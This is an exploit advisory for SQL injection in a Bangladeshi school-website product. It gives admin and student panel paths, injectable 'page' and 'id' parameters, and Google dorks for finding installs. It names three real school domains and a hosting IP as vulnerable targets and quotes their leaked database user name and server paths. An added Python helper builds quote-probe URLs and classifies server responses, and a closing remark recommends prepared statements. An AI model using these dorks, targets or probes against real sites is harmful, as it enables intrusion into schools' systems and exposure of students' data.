KingSkrupellos

Sikder Computer Center Mathbaria Bangladesh SQL Injection

Jan 7th, 2019
#####################################################################

# Exploit Title : Sikder Computer Center Mathbaria Bangladesh SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : sikdercomputer.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:"Design & Developed by Sikder Computer, Mathbaria" site:edu.bd
#                intext:"Powered by Sikder Computer" site:edu.bd
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link : cyberizm.org/cyberizm-sikder-computer-center-mathbaria-bd-sql-injection.html
# CXSecurity Exploit Reference Link : cxsecurity.com/issue/WLB-2019010044

#####################################################################

# Admin/Teacher/Student Panel Login Path :
***************************************

[PATH]/admin/index
[PATH]/students_panel/index

# SQL Injection Exploit :
***********************

[PATH]/view_gallery_meetings?page=[SQL Injection]

[PATH]/current_success_students_info?id=[SQL Injection]

[PATH]/ex_success_students_info?id=[SQL Injection]

#####################################################################

# Example Vulnerable Sites =>
*****************************

Note : (67.23.238.179) => 1,107 domains are hosted on this server.

[+] sbss.edu.bd/sonar/view_gallery_meetings?page=1%27

[+] nalivimss.edu.bd/nali/view_gallery_meetings?page=1%27

[+] laylamalekia.edu.bd/layla/current_success_students_info?id=16%27

# SQL Database Error :
*********************

Warning: mysql_connect(): Access denied for user 'nalivims_sms'@'localhost'
(using password: YES) in /home/nalivimssedu/public_html/nali/admin/config/config.php on line 3

Warning: mysql_select_db() expects parameter 2 to be resource, boolean given in
/home/nalivimssedu/public_html/nali/admin/config/config.php on line 5
Couldn't Connect to the database ***No database found ***

Warning: mysql_query(): Access denied for user ''@'localhost'
(using password: NO) in /home/nalivimssedu/public_html/nali/view_gallery_meetings.php on line 19

Note : the three warnings above are database connection failures, not a MySQL syntax error caused by the injected quote. mysql_connect() is refused with the credentials in config.php, mysql_select_db() then receives the boolean false instead of a link resource, and mysql_query() on line 19 falls back to PHP's default (empty) account because no connection is open. That sequence does not depend on the value of page, so on its own it proves nothing about the injection; repeat the %27 check when the application's database is reachable. What the response does confirm is that PHP warnings are displayed to visitors, disclosing the absolute web root (/home/nalivimssedu/public_html/nali/), the location of the database config file, the database user name and the script and line that issue the query (view_gallery_meetings.php line 19).

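The following Python helper is an added example, not part of this advisory or of the vendor's application. It turns the three injection points listed above and the warning output in this section into an offline triage routine: it builds the baseline, %27 and %27%27 probe URLs for each parameter, parses PHP/MySQL warnings out of a response to record what the server disclosed (function, absolute path, line, MySQL account), and returns a differential verdict that separates a quote-induced failure from the payload-independent connection errors shown above. The host name, file paths and response bodies in it are constructed for the demonstration and do not come from any of the sites named on this page.

```python
"""Offline triage for the injection points above (added example; every name in it is hypothetical)."""
import re
import urllib.parse

# Injection points exactly as the advisory lists them: (script, parameter, benign value).
INJECTION_POINTS = [
    ("view_gallery_meetings", "page", "1"),
    ("current_success_students_info", "id", "16"),
    ("ex_success_students_info", "id", "16"),
]

TAG_RE = re.compile(r"<[^>]+>")
WS_RE = re.compile(r"\s+")
# One PHP warning once tags are stripped and whitespace collapsed; the colon after "()" is optional.
WARNING_RE = re.compile(
    r"Warning\s*:\s*(?P<func>mysql_\w+)\(\):?\s*(?P<msg>.+?)"
    r"\s+in\s+(?P<path>/\S+)\s+on\s+line\s+(?P<line>\d+)"
)
ACCOUNT_RE = re.compile(r"for user '(?P<user>[^']*)'@'(?P<host>[^']*)'")


def normalize(body):
    """Strip HTML tags and collapse whitespace so bodies can be compared and parsed."""
    return WS_RE.sub(" ", TAG_RE.sub(" ", body)).strip()


def build_probe_urls(base, script, param, value):
    """(baseline, quote, double-quote) URLs for one injection point.  value + "'" is the advisory's
    own check (?page=1%27); value + "''" is the control: inside a single-quoted SQL literal '' is a
    valid escaped quote, so a value that really reaches the query should match the baseline again."""
    def url(v):
        return f"{base.rstrip('/')}/{script}?{urllib.parse.urlencode({param: v})}"
    return url(value), url(value + "'"), url(value + "''")


def extract_disclosures(body):
    """PHP/MySQL warnings in a body: failing function, message, leaked absolute path and
    line number, and the MySQL account if an 'Access denied' message names one."""
    found = []
    for m in WARNING_RE.finditer(normalize(body)):
        acct = ACCOUNT_RE.search(m.group("msg"))
        found.append({"func": m.group("func"), "msg": m.group("msg"),
                      "path": m.group("path"), "line": int(m.group("line")),
                      "user": acct.group("user") if acct else None})
    return found


def classify(baseline, quote, double_quote):
    """Differential verdict for one parameter from its three probe responses:
    connection-error   identical DB warnings with and without the payload, i.e. the app cannot
                       reach its database and the output says nothing about injection
    likely-injectable  the lone quote changes the page and '' restores it
    error-on-quote     the lone quote adds DB warnings but '' does not restore the page
    no-signal          nothing changes"""
    b, q, d = (normalize(x) for x in (baseline, quote, double_quote))
    base_w = {(w["func"], w["msg"]) for w in extract_disclosures(b)}
    quote_w = {(w["func"], w["msg"]) for w in extract_disclosures(q)}
    if base_w and base_w == quote_w:
        return "connection-error"
    if q != b and d == b:
        return "likely-injectable"
    if quote_w - base_w:
        return "error-on-quote"
    return "no-signal"


def probe_all(base, fetch):
    """Run the three-way check on every listed injection point.  `fetch` is any callable
    URL -> body, so the logic can be exercised offline with canned responses."""
    verdicts = {}
    for script, param, value in INJECTION_POINTS:
        bodies = [fetch(u) for u in build_probe_urls(base, script, param, value)]
        verdicts[f"{script}?{param}"] = classify(*bodies)
    return verdicts


# Constructed sample bodies for offline use (not captured from any real host; paths invented).
SAMPLE_OK = "<html><body><h1>Gallery</h1><p>Page 1 of 3</p></body></html>"
SAMPLE_QUOTE = (
    "<html><body><br /><b>Warning</b>:  mysql_fetch_array() expects parameter 1 to be "
    "resource, boolean given in <b>/home/example/public_html/app/view_gallery_meetings.php</b> "
    "on line <b>21</b><br /><h1>Gallery</h1></body></html>"
)
SAMPLE_DOWN = (
    "<br /><b>Warning</b>:  mysql_connect(): Access denied for user 'example_sms'@'localhost' "
    "(using password: YES) in <b>/home/example/public_html/app/admin/config/config.php</b> "
    "on line <b>3</b><br />Couldn't Connect to the database ***No database found ***"
)


def demo_fetch(url):
    """Canned responder: only the lone-quote URL breaks, mimicking an injectable parameter."""
    return SAMPLE_QUOTE if url.endswith("%27") and not url.endswith("%27%27") else SAMPLE_OK


if __name__ == "__main__":
    for point, verdict in probe_all("http://example.invalid/app", demo_fetch).items():
        print(f"{point}: {verdict}")
```

For a live check of a host you are authorised to test, pass a real fetcher such as `lambda u: urllib.request.urlopen(u).read().decode()` to probe_all in place of demo_fetch. A verdict of connection-error is what the warnings quoted above would produce, since they appear with or without the payload; likely-injectable is only returned when the lone quote alters the page and the balanced '' brings the baseline back. On the application side the fix for page and id is to cast them to an integer or bind them with a prepared statement instead of concatenating them into the query string.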
#####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#####################################################################